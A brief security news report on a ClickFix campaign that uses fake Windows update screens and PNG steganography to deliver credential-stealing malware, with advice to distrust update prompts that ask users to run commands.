Security researchers have identified a new ClickFix attack targeting Windows users with fake security updates. Attackers are deploying realistic Windows Security Update screens to trick users into executing harmful commands.
Recent Campaign Details
The ClickFix method, a form of social engineering, has become a prevalent technique for coercing users to run damaging commands on their devices. A report from Huntress on 2025-11-24 highlights the latest ClickFix campaigns delivering credential-stealing malware.
Analysts Ben Folland and Anna Pham from Huntress observed the use of steganography, hiding malicious code within PNG images. The malware uses color channels to decode the payload in memory, adding complexity and stealth to the attack.
Safety Recommendations
All Windows users should be cautious and verify update prompts through official Microsoft channels. A legitimate Windows update will never ask users to input commands into the Windows run prompt. Any such prompts should be disregarded and treated as potential threats.
The increase in these attacks underscores the need for vigilance as both state-sponsored and criminal groups exploit this method for initial access to systems.
